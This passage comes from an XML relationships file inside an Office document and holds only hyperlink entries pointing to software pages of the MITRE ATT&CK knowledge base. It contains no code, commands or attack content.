TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0261" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0134" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0396" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0381" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0690" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0205" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0346" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0184" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0518" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0240" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0176" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0160" TargetMode="External"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1048" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0132" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0394" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0648" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0438" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0014" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0162" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1016" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0185" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1018" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0273" TargetMode="External"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0603" TargetMode="External"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0668" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0257" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0574" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0614" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0243" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0568" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0628" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0666" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0149" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0457" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0016" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0643" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0113" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0055" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0579" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0230" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0119" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0611" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0040" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0357" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0148" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0225" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0065" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0470" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0585" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0372" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0688" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0448" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0035" TargetMode="External"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0444" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0131" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0116" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0043" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1033" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0384" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0152" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0383" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0228" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0340" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0613" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0476" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1039" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0572" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0342" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0151" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0453" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0430" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0175" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1029" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0009" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0163" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0236" TargetMode="External"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0282" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0241" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0511" TargetMode="External"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0450" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0074" TargetMode="External"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0627" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0018" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0004" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0127" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0046" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0354" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0377" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0076" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0284" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0508" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0626" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0333" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0268" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0693" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0054" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0049" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0517" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0654" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0515" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0027" TargetMode="External"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0653" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0677" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0070" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0604" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0487" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0447" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0339" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0078" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0481" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0400" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0390" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0445" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0436" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0255" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0547" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0401" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0133" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0336" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0439" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0671" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0347" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0638" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0482" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0144" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0661" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0196" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0378" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0636" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0141" TargetMode="External"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0472" TargetMode="External"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0102" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0460" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0037" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0601" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0528" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0042" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0409" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0662" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0019" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0028" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0370" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0242" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0488" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0021" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1047" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0615" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0092" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0017" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0570" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0454" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0154" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0624" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0512" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0118" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0158" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0048" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0279" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0199" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0275" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0514" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0330" TargetMode="External"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0123" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0469" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0193" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0047" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0259" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1020" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0582" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0147" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0565" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0270" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1037" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0051" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0589" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0414" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0631" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0502" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0365" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1046" TargetMode="External"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0060" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0207" TargetMode="External"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0105" TargetMode="External"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0108" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0249" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0214" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0215" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0495" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1023" TargetMode="External"/><Relationship Id="rId289" 